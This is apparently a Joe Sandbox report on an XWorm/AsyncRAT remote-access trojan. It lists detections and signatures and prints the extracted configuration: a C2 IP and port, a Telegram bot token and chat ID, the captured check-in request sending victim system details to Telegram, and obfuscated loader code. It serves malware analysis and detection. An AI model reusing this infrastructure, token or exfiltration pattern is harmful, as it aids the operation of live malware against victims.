Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Mzo6BdEtGv.exe

Overview

General Information

Sample name:Mzo6BdEtGv.exe
renamed because original name is a hash value
Original sample name:e9434c0bf7be5e39cfad4fe44bb996b09c1283de5706a8721a33363080e9d016.exe
Analysis ID:1562435
MD5:068c99328320caaa7c5f2d31b0ff214b
SHA1:e18b1e08e7f256602be60e1d75b15c2c73284ca2
SHA256:e9434c0bf7be5e39cfad4fe44bb996b09c1283de5706a8721a33363080e9d016
Tags:89-40-31-232AsyncRATexeuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Mzo6BdEtGv.exe (PID: 7760 cmdline: "C:\Users\user\Desktop\Mzo6BdEtGv.exe" MD5: 068C99328320CAAA7C5F2D31B0FF214B)
  • cleanup
{"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
Mzo6BdEtGv.exeJoeSecurity_XWormYara detected XWormJoe Security
    Mzo6BdEtGv.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      Mzo6BdEtGv.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xfc48:$cnc4: POST / HTTP/1.1
      SourceRuleDescriptionAuthorStrings
      sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
        SourceRuleDescriptionAuthorStrings
        00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x109da:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x10a77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x10b8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xfa48:$cnc4: POST / HTTP/1.1
          Process Memory Space: Mzo6BdEtGv.exe PID: 7760JoeSecurity_XWormYara detected XWormJoe Security
            Process Memory Space: Mzo6BdEtGv.exe PID: 7760JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              SourceRuleDescriptionAuthorStrings
              1.0.Mzo6BdEtGv.exe.e0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                1.0.Mzo6BdEtGv.exe.e0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  1.0.Mzo6BdEtGv.exe.e0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x10bda:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x10c77:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x10d8c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0xfc48:$cnc4: POST / HTTP/1.1
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-25T15:36:47.299659+010028536851A Network Trojan was detected192.168.2.1049708149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Mzo6BdEtGv.exeAvira: detected
                  Source: 00000001.00000002.3744158819.0000000002491000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["89.40.31.232"], "Port": 1717, "Aes key": "1717", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk", "Telegram Chatid": "793028759", "Version": "XWorm V5.6"}
                  Source: Mzo6BdEtGv.exeReversingLabs: Detection: 81%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: Mzo6BdEtGv.exeJoe Sandbox ML: detected
                  Source: Mzo6BdEtGv.exeString decryptor: 89.40.31.232
                  Source: Mzo6BdEtGv.exeString decryptor: 1717
                  Source: Mzo6BdEtGv.exeString decryptor: <Xwormmm>
                  Source: Mzo6BdEtGv.exeString decryptor: 28Nov2024
                  Source: Mzo6BdEtGv.exeString decryptor: USB.exe
                  Source: Mzo6BdEtGv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49708 version: TLS 1.2
                  Source: Mzo6BdEtGv.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.10:49708 -> 149.154.167.220:443
                  Source: Malware configuration extractorURLs: 89.40.31.232
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: Mzo6BdEtGv.exe, type: SAMPLE
                  Source: Yara matchFile source: 1.0.Mzo6BdEtGv.exe.e0000.0.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.10:49718 -> 89.40.31.232:1717
                  Source: global trafficHTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFE6865D607A29FAFDCBE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GCCE9LGK%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: unknownTCP traffic detected without corresponding DNS query: 89.40.31.232
                  Source: global trafficHTTP traffic detected: GET /bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFE6865D607A29FAFDCBE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20GCCE9LGK%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: Mzo6BdEtGv.exe, 00000001.00000002.3744158819.0000000002491000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Mzo6BdEtGv.exeString found in binary or memory: https://api.telegram.org/bot
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49708 version: TLS 1.2
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  Operating System Destruction

                  barindex
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Source: Mzo6BdEtGv.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 1.0.Mzo6BdEtGv.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeCode function: 1_2_00007FF7C14B8AF21_2_00007FF7C14B8AF2
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeCode function: 1_2_00007FF7C14B7D761_2_00007FF7C14B7D76
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeCode function: 1_2_00007FF7C14B0E001_2_00007FF7C14B0E00
                  Source: Mzo6BdEtGv.exe, 00000001.00000000.1284453608.00000000000F6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRaw.exe4 vs Mzo6BdEtGv.exe
                  Source: Mzo6BdEtGv.exeBinary or memory string: OriginalFilenameRaw.exe4 vs Mzo6BdEtGv.exe
                  Source: Mzo6BdEtGv.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: Mzo6BdEtGv.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 1.0.Mzo6BdEtGv.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000001.00000000.1284426259.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: Mzo6BdEtGv.exe, hMY5B4KaPYBa602NktZ1e4wVF.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Mzo6BdEtGv.exe, hMY5B4KaPYBa602NktZ1e4wVF.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Mzo6BdEtGv.exe, jK41xlYzptzDvBwid77hpLBxe.csCryptographic APIs: 'TransformFinalBlock'
                  Source: Mzo6BdEtGv.exe, mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.csBase64 encoded string: 'qrWW57nvRyn00elFuCjeH95KEzu0nXD9a1EjNFsSKWI2JzFd5o/JI2uySuuacGCA', '+bL0Nu45rwxtL0cMX4ZDcUSHH3rmdtZKKBX0tVrBX2mcmOmjJAcRtFN7nI8gGYKb', 'XbCAm7wk1EHocambvU0XTCBTwiKRR/zkfWRJY9ookY+YTfzwlIcF1A1ctpAhu+T9'
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/2
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeMutant created: \Sessions\1\BaseNamedObjects\qnzzEC3SI3U6Qmbo
                  Source: Mzo6BdEtGv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Mzo6BdEtGv.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Mzo6BdEtGv.exeReversingLabs: Detection: 81%
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Mzo6BdEtGv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Mzo6BdEtGv.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.s0WM2rftlZrRlhpT9idv7uV2rEAk3RlDIRYceKaW8hMQZWHZ3if6pKKdSwrO3i6SmI8jN8qTehoPLePY,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.K9kh2nJimtKDkF7jGN6eOd0ZBVsYLZ7YTiqXJa0VWb7ngnSoPpI3YU89NdMotITNtPSuHNkei72vyLFV,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y._1VsNF3cuRvQjwiilTAyyEblbspHKx7OA31GBuBBfIztGXCQx9m6QqF40eYLT22g5Bszm2KIQ5LVg1IZ1,mK69YrOOVvkRIJcg2Itn2qte4uNHnFFpqNYoiWk6dZXvcA18GObkGDSoAEFI3sGocc8yJRklhJlGr41Y.ympPucUHwJnSfU7tayEsRSXhtDbUO82bWiMAWHZeuvxaIszE8LvDTEq6E7WsvXRLFcNZeKLM5vQwdPie,hMY5B4KaPYBa602NktZ1e4wVF._8LzAMDP2lSg0J0oH5GGzV7TVx()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[2],hMY5B4KaPYBa602NktZ1e4wVF._4kByA7KtFVCEau2DpQjG31KJu(Convert.FromBase64String(vUyM4H5F9bQnCqdcynRb0XuhdS5eCilG7xt1z5yPlwwhppbQajtCs1pZGPsb3HWP6iZs04PXwEcvK3tt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
                  Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
                  Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs.Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
                  Source: C:\Users\user\Desktop\Mzo6BdEtGv.exeCode function: 1_2_00007FF7C14B3608 push ebx; retn FFEEh1_2_00007FF7C14B363A
                  Source: Mzo6BdEtGv.exe, lYfWlfT3r7Vqz88tbfAuCjKRe.csHigh entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
                  Source: Mzo6BdEtGv.exe, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
                  Source: Mzo6BdEtGv.exe, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.csHigh entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 